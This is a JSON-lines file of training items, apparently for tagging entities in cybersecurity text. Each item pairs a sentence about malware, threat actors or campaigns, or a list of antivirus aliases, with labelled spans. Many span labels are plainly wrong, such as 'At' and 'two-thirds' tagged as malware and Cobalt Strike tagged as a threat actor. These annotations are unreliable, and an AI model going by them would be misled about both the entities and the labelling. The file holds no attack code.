{"text": "Palo Alto Networks has observed a recent high-threat spam campaign that is serving malicious macro documents used to execute PowerShell scripts which injects malware similar to the Ursnif family directly into memory.", "spans": {"ORGANIZATION: Palo Alto Networks": [[0, 18]], "MALWARE: high-threat": [[41, 52]], "THREAT_ACTOR: spam campaign": [[53, 66]], "MALWARE: malicious macro": [[83, 98]], "MALWARE: malware": [[158, 165]], "MALWARE: Ursnif family": [[181, 194]], "VULNERABILITY: directly into memory.": [[195, 216]]}, "info": {"id": "cyner2_train_002022", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.WintaskLTE.Trojan Win32/Bancos.ABHY Trojan.Phisher.G Trojan.Dynamer.D9 Trojan.Phisher.G Troj.PSW.PHP.AccPhish.lstI Win32.Trojan.WisdomEyes.16070401.9500.9987 PHP/PSW.Phishack.AT Trojan.Phisher.G Trojan.Phisher.G Trojan.PWS.Stealer.895 BehavesLike.Win32.PWSMmorpg.vc Trojan/PSW.VKont.pq TR/Spy.PHP.psb Trojan[PSW]/PHP.AccPhish.rr Trojan.Phisher.G Trojan:Win32/Phishacco.A Trojan.Phisher.G Trj/CI.A Php.Trojan-qqpass.Qqrob.Sxxq Trojan.PHP.PSW W32/AccPhish.EU!tr.pws Win32/Trojan.d71", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002023", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.TenoesaASN.Trojan Worm/W32.WBNA.102405 Win32.Trojan.WisdomEyes.16070401.9500.9978 Worm.Win32.WBNA.oaw Downloader.VB.Win32.98815 BehavesLike.Win32.Downloader.cm Win32.Sality TR/AD.Maywidmzi.brqly TrojanDownloader:Win32/Maywidmzi.A Worm.Win32.WBNA.oaw Worm/Win32.WBNA.C1716518 Worm.WBNA Trj/GdSda.A Win32/TrojanDownloader.VB.QXP Win32.Worm.Wbna.Ects Trojan.DL.VB!tTzkeI6oupQ", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002024", "source": "cyner2_train"}}
{"text": "Login details are sent to attackers using an HTTP GET connection ONLY once.", "spans": {"THREAT_ACTOR: attackers": [[26, 35]]}, "info": {"id": "cyner2_train_002025", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Lodap Trojan/Exploit.CVE-2010-2568.f TROJ_STUXNET.DX W32.Stuxnet TROJ_STUXNET.DX Win.Trojan.Stuxnet-36 Exploit.Win32.CVE-2010-2568.b Exploit.Win32.CVE20102568f.bkuia Exploit.W32.CVE-2010-2568.f!c Win32.Exploit.Cve-2010-2568.Wopr Exploit.CVE.Win32.14 Trojan.Win32.Exploit Trojan[Exploit]/Win32.CVE-2010-2568 Exploit.Win32.CVE-2010-2568.b Exploit.Stuxnet Trj/ChymineLNK.A Win32/Exploit.CVE-2010-2568 Win32/Trojan.Exploit.406", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002026", "source": "cyner2_train"}}
{"text": "MrWhite can profile the victim systems for the presence of running POS software before dropping further POS payloads.", "spans": {"MALWARE: MrWhite": [[0, 7]], "SYSTEM: victim systems": [[24, 38]], "SYSTEM: POS software": [[67, 79]], "MALWARE: POS payloads.": [[104, 117]]}, "info": {"id": "cyner2_train_002027", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.48F3 Trojan.Kazy.D8696E Win32.Trojan.WisdomEyes.16070401.9500.9999 TROJ_CRYPCTB.SME Troj.Downloader.W32.FraudLoad.kYSC TROJ_CRYPCTB.SME BehavesLike.Win32.Upatre.tc Trojan:Win32/Triflearch.B Trojan.FakeAV.01657 Win32.Trojan.Crypt.Dzag Trojan.Win32.Crypt Win32/Trojan.8cf", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002028", "source": "cyner2_train"}}
{"text": "Malicious code identified, simple UDP DDoS attacks recorded.", "spans": {"MALWARE: Malicious code": [[0, 14]]}, "info": {"id": "cyner2_train_002029", "source": "cyner2_train"}}
{"text": "It steals sensitive information, such as cryptocurrency wallet data, from different applications and uses a file grabber for collecting a predefined list of file types, then exfiltrates them via Telegram.", "spans": {"SYSTEM: cryptocurrency wallet": [[41, 62]], "SYSTEM: applications": [[84, 96]], "SYSTEM: file grabber": [[108, 120]], "SYSTEM: Telegram.": [[195, 204]]}, "info": {"id": "cyner2_train_002032", "source": "cyner2_train"}}
{"text": "Forcepoint Security Labs™ have observed today a major malicious email campaign from the Necurs botnet spreading a new ransomware which appears to call itself Jaff peaking within our telemetry at nearly 5m emails per hour.", "spans": {"ORGANIZATION: Forcepoint Security Labs™": [[0, 25]], "THREAT_ACTOR: major malicious email campaign": [[48, 78]], "MALWARE: the Necurs botnet": [[84, 101]], "MALWARE: ransomware": [[118, 128]], "MALWARE: Jaff": [[158, 162]], "SYSTEM: telemetry": [[182, 191]]}, "info": {"id": "cyner2_train_002033", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/Downloader.Dapato.cjt Trojan.Kryptik!UYVcX29KF20 W32/Krypt.DZ Trojan.Win32.Cleaman!IK TrojWare.Win32.Kryptik.ZLB Trojan.DownLoad2.49842 TR/FakeAV.bzqra TrojanDownloader.Dapato.ace TrojanDownloader:Win32/Cred.B Trojan/Win32.Menti TrojanDownloader.Dapato.cfq Trojan.Win32.Cleaman W32/Kryptik.ACD!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002034", "source": "cyner2_train"}}
{"text": "PwC's cyber security practice has worked closely with BAE Systems and other members of the security community, along with the UK's National Cyber Security Centre NCSC, to uncover and disrupt what is thought to be one of the largest ever sustained global cyber espionage campaigns in an operation referred to as Operation Cloud Hopper'.", "spans": {"ORGANIZATION: PwC's cyber security": [[0, 20]], "ORGANIZATION: BAE Systems": [[54, 65]], "ORGANIZATION: the security community,": [[87, 110]], "ORGANIZATION: the UK's National Cyber Security Centre NCSC,": [[122, 167]], "THREAT_ACTOR: global cyber espionage campaigns": [[247, 279]], "THREAT_ACTOR: Operation Cloud Hopper'.": [[311, 335]]}, "info": {"id": "cyner2_train_002037", "source": "cyner2_train"}}
{"text": "If some malware samples remain simple see my previous diary, others try to install malicious files in a smooth way to the victim computers.", "spans": {"MALWARE: malware": [[8, 15]], "SYSTEM: the victim computers.": [[118, 139]]}, "info": {"id": "cyner2_train_002038", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Kazy.D55679 Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.Win32.Starter.cuyepr Trojan.Starter.2890 BehavesLike.Win32.Trojan.vm Trojan.Dropper MSIL/Injector.WSX!tr Win32/Trojan.e6d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002039", "source": "cyner2_train"}}
{"text": "Among their most notable presumed targets are the American Democratic National Committee, the German parliament and the French television network TV5Monde.", "spans": {"ORGANIZATION: the American Democratic National Committee, the German parliament": [[46, 111]], "ORGANIZATION: the French television network TV5Monde.": [[116, 155]]}, "info": {"id": "cyner2_train_002041", "source": "cyner2_train"}}
{"text": "BlackEnergy is a Trojan that was created by a hacker known as Cr4sh.", "spans": {"THREAT_ACTOR: BlackEnergy": [[0, 11]], "MALWARE: Trojan": [[17, 23]], "THREAT_ACTOR: hacker": [[46, 52]], "THREAT_ACTOR: Cr4sh.": [[62, 68]]}, "info": {"id": "cyner2_train_002044", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Sylavriu BKDR_SYLAVRIU.SM Win32.Trojan.WisdomEyes.16070401.9500.9996 Trojan.Zbot BKDR_SYLAVRIU.SM Win.Trojan.Torct-1 W32.Trojan.Torct Trojan/MSIL.Crypt Trojan.MSIL.Krypt.2 Backdoor:MSIL/Sylavriu.A Dropper/Win32.Adminuser.R118179 Trojan.MSIL.Crypt Trojan.Crypt!ZlAnMaNuAFw Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002045", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Win32.Redsip!O Trojandropper.Redsip Backdoor.Redsip.k Backdoor.Redsip.Win32.8 Backdoor/Redsip.k Win32.Trojan.WisdomEyes.16070401.9500.9970 W32/Backdoor2.HIOH Hacktool.Keylogger Win32/Redsip.A Backdoor.Win32.Redsip.a Trojan.Win32.Redsip.dcevd Backdoor.Win32.A.Redsip.159744 Backdoor.W32.Redsip.k!c BehavesLike.Win32.Ramnit.ct W32/Backdoor.VDXS-0842 BDS/Redsip.B W32/Redsip.A!tr Trojan[Backdoor]/Win32.Redsip Backdoor.Win32.Redsip.a TrojanDropper:Win32/Redsip.B Trojan/Win32.Redsip.C245513 Backdoor.Redsip Win32/Redsip.AA Win32.Backdoor.Redsip.Amvr Backdoor.Win32.Redsip", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002050", "source": "cyner2_train"}}
{"text": "Phony Tech Support Scams Now Target Macs", "spans": {"THREAT_ACTOR: Phony Tech Support": [[0, 18]], "SYSTEM: Macs": [[36, 40]]}, "info": {"id": "cyner2_train_002051", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Hexzone.bdlvxl Adware.Margoc MalCrypt.Indus! VirTool.Win32.Obfuscator.a Trojan:Win32/Procesemes.A.dll Trojan/Win32.Xema Adware.Margoc!rem", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002054", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Ransom.Urausy.E4 Ransom_Urausy.R038C0CB418 Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.Ransomlock.Q Ransom_Urausy.R038C0CB418 Trojan.Win32.Winlock.crahoz TrojWare.Win32.FakeAv.ASC Trojan.Winlock.9260 Trojan/Foreign.shn Ransom:Win32/Urausy.E Trojan.Zusy.D10991 Trojan/Win32.Foreign.R84961 SScope.Malware-Cryptor.Hlux Win32/LockScreen.AQD Trojan.Win32.Urausy", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002055", "source": "cyner2_train"}}
{"text": "In addition, HummingBad installs fraudulent apps to increase the revenue stream for the fraudster.", "spans": {"MALWARE: HummingBad": [[13, 23]], "THREAT_ACTOR: fraudster.": [[88, 98]]}, "info": {"id": "cyner2_train_002056", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32/SillyDl.XXJ!packed Trojan-Dropper.Win32.Dorifel.acvt Trojan.DownLoader1.46415 BehavesLike.Win32.Adware.cc TrojanDownloader:Win32/Plingky.A Trojan.Heur.EDD31E Trojan-Dropper.Win32.Dorifel.acvt Trojan-Downloader.Win32.Small W32/Dorifel.ACVT!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002059", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/Clicker.BHO.ncx Trojan.Zbot Win32/TrojanClicker.BHO.NCX TROJ_SPNR.30BB13 Trojan.Win32.Starter.amcr Trojan.Win32.Starter.dzdloa Win32.Trojan.Starter.Suef TROJ_SPNR.30BB13 BehavesLike.Win32.Downloader.gh TR/Lickore.B.7 W32/TrojanClicker_BHO.NCX PUP/Win32.Msbuyn.N640533768 Trojan:Win32/Lickore.B Win32/Lickore.B Trojan-Clicker.BAHK Clicker.BAHK", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002060", "source": "cyner2_train"}}
{"text": "The command and control C&C communications for new variants use the same AES256 encryption for any traffic to the attacker's server; in previous variants, only Base64 encoding was used.", "spans": {"MALWARE: variants": [[51, 59]], "SYSTEM: server;": [[125, 132]]}, "info": {"id": "cyner2_train_002061", "source": "cyner2_train"}}
{"text": "Disttrack is a multipurpose tool that exhibits worm-like behavior by attempting to spread to other systems on a local network using stolen administrator credentials.", "spans": {"MALWARE: Disttrack": [[0, 9]], "MALWARE: tool": [[28, 32]], "MALWARE: worm-like": [[47, 56]], "SYSTEM: systems": [[99, 106]], "SYSTEM: local network": [[112, 125]]}, "info": {"id": "cyner2_train_002062", "source": "cyner2_train"}}
{"text": "Since the beginning of January 2017, the BSI, as the national cyber security agency, has been in close contact with the German Bundestag, due to the network traffic of the German Bundestag.", "spans": {"ORGANIZATION: BSI,": [[41, 45]], "ORGANIZATION: the national cyber security agency,": [[49, 84]], "ORGANIZATION: the German Bundestag,": [[116, 137]], "SYSTEM: network traffic": [[149, 164]], "ORGANIZATION: the German Bundestag.": [[168, 189]]}, "info": {"id": "cyner2_train_002063", "source": "cyner2_train"}}
{"text": "Additionally, when we searched for the decoded string value we found a single search engine result that pointed to a Pastebin page.", "spans": {"SYSTEM: search engine": [[78, 91]]}, "info": {"id": "cyner2_train_002064", "source": "cyner2_train"}}
{"text": "First, Winnti uses Cobalt Strike to collect credentials and move laterally.", "spans": {"THREAT_ACTOR: Winnti": [[7, 13]], "THREAT_ACTOR: Cobalt Strike": [[19, 32]]}, "info": {"id": "cyner2_train_002065", "source": "cyner2_train"}}
{"text": "At the time of investigation this malware was not correctly detected by any existing antivirus engines, and domains / IP s were not found in any commercial threat intelligence feeds.", "spans": {"MALWARE: At": [[0, 2]], "MALWARE: malware": [[34, 41]], "SYSTEM: antivirus engines,": [[85, 103]], "ORGANIZATION: commercial threat intelligence feeds.": [[145, 182]]}, "info": {"id": "cyner2_train_002066", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Razy.D31A9 Win32.Trojan.WisdomEyes.16070401.9500.9960 TROJ_HOYGUNER.SM Trojan.Win32.Drop.dhxynu TROJ_HOYGUNER.SM Virus.MSIL W32.Trojan.Dropper Trojan:MSIL/Hoygunver.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002067", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.DeadBeef.Worm Worm/W32.AutoRun.175104 Worm.Win32.AutoRun!O Worm.AutoRun.Win32.8121 W32/AutoRun.pv W32.SillyFDC Win32/Wainlas.A WORM_AUTORUN_000002c.TOMA Win.Worm.Autorun-1414 Worm.Win32.AutoRun.pv Trojan.Win32.AutoRun.ltul Win32.Worm.Autorun.Tbim Worm.Win32.AutoRun.~MAA Win32.HLLW.Autoruner.748 WORM_AUTORUN_000002c.TOMA Worm/AutoRun.bhu TR/Drop.AutoRun.BM Worm/Win32.AutoRun Worm.Win32.Autorun.12728 Worm.Win32.AutoRun.pv Worm/Win32.AutoRun.R16694 Worm.AutoRun Worm.Win32.AutoRun W32/AutoRun.NTQ!worm Trj/Debat.A Trojan.PSW.Win32.QQPass.CF", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002068", "source": "cyner2_train"}}
{"text": "During the WannaCry pandemic attack, CyphortLabs discovered that other threat actors have been using the same EternalBlue exploit to deliver other malware.", "spans": {"MALWARE: WannaCry": [[11, 19]], "ORGANIZATION: CyphortLabs": [[37, 48]], "ORGANIZATION: threat actors": [[71, 84]], "MALWARE: same EternalBlue exploit": [[105, 129]], "MALWARE: malware.": [[147, 155]]}, "info": {"id": "cyner2_train_002069", "source": "cyner2_train"}}
{"text": "Although bitcoin miners have been used by cybercriminals before as a way to monetize their malicious activities, this recent sample MD5: 522f8ba8b2dec299cc64c0ccf5a68000 caught our attention because it is unusually heavy, persistent, and obfuscated.", "spans": {"MALWARE: bitcoin miners": [[9, 23]], "THREAT_ACTOR: cybercriminals": [[42, 56]]}, "info": {"id": "cyner2_train_002070", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.kowinHA.Worm Backdoor.Win32.Popwin!O Trojan.Heur.amuaxSBiYpji Win32.Trojan.WisdomEyes.16070401.9500.9769 W32.Popwin Win32/Pipown.NW TROJ_NSPAK.A Trojan.Win32.Popwin.jgms Constructor.W32.VB.lgxd Backdoor.Win32.Popwin.~IQ Trojan.Popwin TROJ_NSPAK.A BehavesLike.Win32.Downloader.lc Trojan/PSW.GamePass.pjs Worm:Win32/Winko.A Backdoor.Popwin Worm.Win32.AutoRun W32/Winko.A!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002071", "source": "cyner2_train"}}
{"text": "The two 0-days in question targeted Adobe Flash and were subsequently labeled CVE-2015-5119 and CVE-2015-5122.", "spans": {"VULNERABILITY: 0-days": [[8, 14]], "SYSTEM: Adobe Flash": [[36, 47]]}, "info": {"id": "cyner2_train_002072", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Fakedos.A Backdoor.Fakedos!ktjmxmN20Kc W32/Backdoor.MDB Backdoor.Trojan BKDR_BACKDOOR4.B Backdoor.Win32.Fakedos.a Backdoor.Fakedos.A Backdoor.Fakedos.A Backdoor.Fakedos.A Email-Worm.Win32.GOPworm.196 BDS/Fakedos.A.1 BKDR_BACKDOOR4.B Win32.Hack.Fakedos.a.kcloud Backdoor.Fakedos.A W32/Backdoor.CVVK-7742 Win-Trojan/Fakedos.94208 TScope.Trojan.VB PE:Backdoor.Fakedos.a!1073830334 BackDoor.Fakedos.C", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002074", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAutoB.44AD Win32.Virus.Downloader.Aojh Trojan-Downloader.Win32.Cekar W32/Noia.B Trj/CI.A Win32/Trojan.dd1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002078", "source": "cyner2_train"}}
{"text": "Used in Pawn Storm to target certain foreign affairs ministries, the vulnerability identified as CVE-2015-7645 represents a significant change in tactics from previous exploits.", "spans": {"THREAT_ACTOR: Pawn Storm": [[8, 18]], "ORGANIZATION: foreign affairs ministries,": [[37, 64]], "VULNERABILITY: vulnerability": [[69, 82]], "VULNERABILITY: exploits.": [[168, 177]]}, "info": {"id": "cyner2_train_002079", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.D995 Virus.Win32.Sality!O Backdoor.PMax Trojan.Win32.PMax.deplgs Backdoor.Win32.PMax.atcf MULDROP.Trojan BehavesLike.Win32.Downloader.mc W32/Poweliks.A!tr Trojan.Zusy.D19DC7 Trojan/Win32.VBKrypt Trojan:Win32/Powessere.A Backdoor.PMax Trojan.Poweliks Trojan.Win32.Poweliks.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002087", "source": "cyner2_train"}}
{"text": "Over the past few months, the tr1adx team has been tracking a Threat Actor which we codenamed TelePort Crew.", "spans": {"ORGANIZATION: tr1adx team": [[30, 41]], "THREAT_ACTOR: Threat Actor": [[62, 74]], "THREAT_ACTOR: TelePort Crew.": [[94, 108]]}, "info": {"id": "cyner2_train_002088", "source": "cyner2_train"}}
{"text": "The infection vector was a drive-by download attack, and the Check Points Threat-Cloud indicates some adult content sites served the malicious payload.", "spans": {"VULNERABILITY: The infection vector": [[0, 20]], "ORGANIZATION: the Check Points Threat-Cloud": [[57, 86]], "MALWARE: malicious payload.": [[133, 151]]}, "info": {"id": "cyner2_train_002091", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Motd.A Backdoor.Motd.A Trojan.Win32.Malware.a Backdoor.Trojan Backdoor.Motd.A Backdoor.Win32.MOTD Backdoor.Motd.A Trojan.Win32.MOTD.glgl Troj.Spy.W32.Delf.mczC Backdoor.Motd.A Backdoor.Motd.A BackDoor.Motd Backdoor.MOTD.Win32.1 BehavesLike.Win32.Ipamor.hh Backdoor.Win32.Y3KRat Trojan[Backdoor]/Win32.MOTD Backdoor.Motd.A Backdoor.Win32.MOTD Trojan.Win32.Malware.a Backdoor.MOTD", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002092", "source": "cyner2_train"}}
{"text": "CloudDuke also greatly expands on the Duke group's usage of cloud storage services, specifically Microsoft's OneDrive, as a channel for both command and control as well as the exfiltration of stolen data.", "spans": {"MALWARE: CloudDuke": [[0, 9]], "ORGANIZATION: Duke group's": [[38, 50]], "SYSTEM: Microsoft's OneDrive,": [[97, 118]]}, "info": {"id": "cyner2_train_002093", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Crypt.CG Downloader.Vidlo.Win32.11 Backdoor.W32.IRCBot.mA1F Trojan.Crypt.CG Win32.Trojan.WisdomEyes.16070401.9500.9959 W32/Downloader.PQKB-6890 Win32/InjectDown.B TROJ_DLOADER.JR Win.Downloader.Small-886 Trojan-Downloader.Win32.Vidlo.k Trojan.Crypt.CG Trojan.Crypt.CG TrojWare.Win32.TrojanDownloader.Vidlo.K Trojan.Crypt.CG Trojan.DownLoader.3548 TROJ_DLOADER.JR Packer.Win32.Mondera W32/Downloader.BEC TrojanDownloader.Small.zu TR/Dldr.Vidlo.K Trojan[Downloader]/Win32.Vidlo Win32.Troj.Vidlo.k.kcloud TrojanDownloader:Win32/Vidlo.I Trojan.Win32.A.Downloader.3584.CB Trojan-Downloader.Win32.Vidlo.k Trojan.Crypt.CG Trojan.Crypt.CG TScope.Malware-Cryptor.SB Win32/TrojanDownloader.Vidlo.K", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002094", "source": "cyner2_train"}}
{"text": "All the text is then copied and - again hidden in the background - sent to a foreign server.", "spans": {}, "info": {"id": "cyner2_train_002095", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Black.r5 Trojan.Win32.Black.deckbe Backdoor.Vinself.C Win32/Leouncia.D TROJ_ORCARAT.A Packed.Win32.Black.d Packed.Win32.Aspack.AB Trojan.DownLoader11.40855 Trojan.Packed.Win32.43496 TROJ_ORCARAT.A BehavesLike.Win32.Dropper.fc W32/Trojan.QUXL-7354 Packed.Black.ahku W32/Black.D!tr Trojan.Heur.wuXa774c9jj Packer.W32.Black.d!c VirTool:Win32/Obfuscator.XY Win32.Packed.Black.Ebzx Trojan-Downloader.Win32.Banload Trojan.Win32.Black.d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002097", "source": "cyner2_train"}}
{"text": "Upon successful exploitation, a new process is created with the PE file embedded in the uploadpref.dat file.", "spans": {"MALWARE: exploitation,": [[16, 29]]}, "info": {"id": "cyner2_train_002098", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.ScriptKD.6648 Trojan.Tiggre Trojan.ScriptKD.6648 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan-Downloader.VBS.Small.l Trojan.Script.Small.dczplj Trojan.ScriptKD.6648 Tool.BtcMine.1036 BehavesLike.Win32.AdwareLinkury.hc W32/Trojan.LHYZ-8303 Trojan[Downloader]/Win32.Betload TrojanDownloader:Win32/Streamto.A Zum.BitCoinMiner.1 Trojan-Downloader.VBS.Small.l Zum.BitCoinMiner.1 Trojan.ScriptKD.6648 Trojan.ScriptKD.6648 Trj/CI.A Trojan.Bitcoinminer Vbs.Trojan-downloader.Small.Stty Trojan-Downloader.VBS.Small.L Win32/Trojan.f11", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002099", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor/Bifrose.sxu Win32.Trojan.WisdomEyes.16070401.9500.9583 W32/Backdoor.BVIJ-4494 BKDR_BIFROSE_0000025.TOMA Win.Trojan.Bifrose-3481 Trojan.Win32.Bifrose.isow Backdoor.Win32.A.Bifrose.51712.B[h] Trojan.MulDrop.16295 Backdoor.Bifrose.Win32.79774 W32/Backdoor2.BVUS Backdoor/SdBot.ees WORM/IrcBot.353792 Trojan[Backdoor]/Win32.Bifrose Trojan:Win32/Mdrop.A Backdoor/Win32.Bifrose.C64544 Backdoor.Bifrose!Gi2ynDtXmII Backdoor.Win32.Bifrose", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002100", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.PDF.Phishing.UX Trojan.PDF.Phish.ve Trojan.PDF.Phishing.UX Trojan.PDF.Phishing.UX EXP/Pidief.EB.523 Trojan.PDF.Phishing.UX Trojan.PDF.Phish.ve Trojan.PDF.Phishing.UX Trojan.PDF.Phishing.UX", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002102", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FamVT.ExpiroPC.PE Worm/W32.Small.6084.H Email-Worm.Win32.Zhelatin!O Email-Worm.Win32.Zhelatin.h W32.W.Zhelatin.l03u TrojWare.Win32.Small.DBY Worm.Zhelatin.Win32.4001 Downloader-BAI.dam Worm/Zhelatin.ok TR/Small.DBY.Y Worm[Email]/Win32.Zhelatin Email-Worm.Win32.Zhelatin.h Win32/Luder.O Downloader-BAI.dam Email-Worm.Win32.Zhelatin W32/DldBAI.H!dam Trj/Alanchum.PH", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002103", "source": "cyner2_train"}}
{"text": "The Locky ransomware has been very active since its return which we documented in a previous blog post.", "spans": {"MALWARE: The Locky ransomware": [[0, 20]]}, "info": {"id": "cyner2_train_002104", "source": "cyner2_train"}}
{"text": "About two-thirds of these apps show some kind of malicious behavior, including displaying ads and downloading apps without the user's consent.", "spans": {"MALWARE: two-thirds": [[6, 16]], "MALWARE: apps": [[26, 30]], "MALWARE: malicious behavior,": [[49, 68]]}, "info": {"id": "cyner2_train_002105", "source": "cyner2_train"}}
{"text": "However, we just recently found new Sage samples that, while they appear to still be Sage 2.2, now have added tricks focused on anti-analysis and privilege escalation.", "spans": {"MALWARE: Sage samples": [[36, 48]], "MALWARE: Sage 2.2,": [[85, 94]], "VULNERABILITY: privilege escalation.": [[146, 167]]}, "info": {"id": "cyner2_train_002106", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32/Spamtool.Y Trojan.Dropper Win32/Mendrem.A Win.Trojan.Proxy-4705 Troj.Proxy.W32!c Trojan.MulDrop.4012 BehavesLike.Win32.Backdoor.cm Trojan-Downloader.Win32.LoadAdv W32/Spamtool.LPPN-6055 Spammer:Win32/Kukunefo.A TScope.Malware-Cryptor.SB Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002107", "source": "cyner2_train"}}
{"text": "When the files are encrypted they DO NOT change file name or extensions and appear normal to the victim until you try to open them.", "spans": {}, "info": {"id": "cyner2_train_002108", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.NForwarded.401408.F Trojan.Beaugrit.A.mue Trojan/Spy.Banhguo.a Win32.Trojan-Spy.Banhguo.a Trojan.Win32.KillFiles.dmlrmm Trojan.Win32.PSWIGames.401408.J TrojWare.Win32.Lmir.RL Trojan.KillFiles.17459 Backdoor.PePatch.Win32.55641 BehavesLike.Win32.Dropper.fc TR/Banhguo.aone Trojan.Symmi.DBA11 Trojan/Win32.OnLineGames.R127640 W32/Banhguo.A!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002112", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FamVT.ExpiroPC.PE Virus.W32.Hupigon.Fqm!c BehavesLike.Win32.RAHack.fc KIT/Mac.Walrus.121 HackTool[Constructor]/Win32.Walrus Constructor:W97M/Walrus.1_21.dam#2 Trj/CI.A Win32/Trojan.488", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002113", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Uds.Dangerousobject.Multi!c Win32.Trojan.WisdomEyes.151026.9950.9988 Heur.AdvML.C Trojan.Win32.MulDrop5.dbmdce BehavesLike.Win32.BrowseFox.nh W32/CoinMiner.QR!tr Trojan.Zusy.D17C80 PUP/Win32.BitCoinMiner.C350160 Trojan:Win32/Figyek.A Win32.Trojan.Adware.Wnmi Trojan.CoinMiner CoinMiner.BLK Trojan.Win32.CoinMiner.QR Win32/Trojan.713", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002115", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Packed.Krap.b.3 Packer.Malware.NSAnti.1 Trojan:Win32/Inhoo.A Packer.Malware.NSAnti.1 Trojan-GameThief.Win32.Magania.aigw", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002116", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Dropper.Axesoft.A Trojan-Dropper/W32.Axesoft.800094 Trojandropper.Axesoft Trojan.Dropper.Axesoft.A Trojan/Dropper.Axesoft TROJ_AXESOFT.A TROJ_AXESOFT.A Trojan.Dropper.Axesoft.A Trojan-Dropper.Win32.Axesoft Trojan.Dropper.Axesoft.A Trojan.Win32.Axesoft-Drp.fdro Troj.Dropper.W32.Axesoft!c Trojan.Dropper.Axesoft.A Trojan.Dropper.Axesoft.A Trojan.MulDrop.216 Dropper.Axesoft.Win32.2 BehavesLike.Win32.Dropper.bc Trojan-PWS.Win32.QQPass W32/Trojan.RHJF-8903 TrojanDropper.Axesoft W32.Trojan.Dropper-AxeSoft BDS/GWGirl.12.C Trojan.Dropper.Axesoft.A Trojan-Dropper.Win32.Axesoft BackDoor-SP.dr TrojanDropper.Axesoft Win32/TrojanDropper.Axesoft Win32.Trojan-dropper.Axesoft.Apde Trojan.DR.Axesoft!crjcgQTkDRg W32/Bdoor.SP!tr Win32/Trojan.Dropper.d68", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002117", "source": "cyner2_train"}}
{"text": "Initial reports of a new variant of ransomware called LockCrypt started in June of this year.", "spans": {"MALWARE: new variant": [[21, 32]], "MALWARE: ransomware": [[36, 46]], "MALWARE: LockCrypt": [[54, 63]]}, "info": {"id": "cyner2_train_002118", "source": "cyner2_train"}}
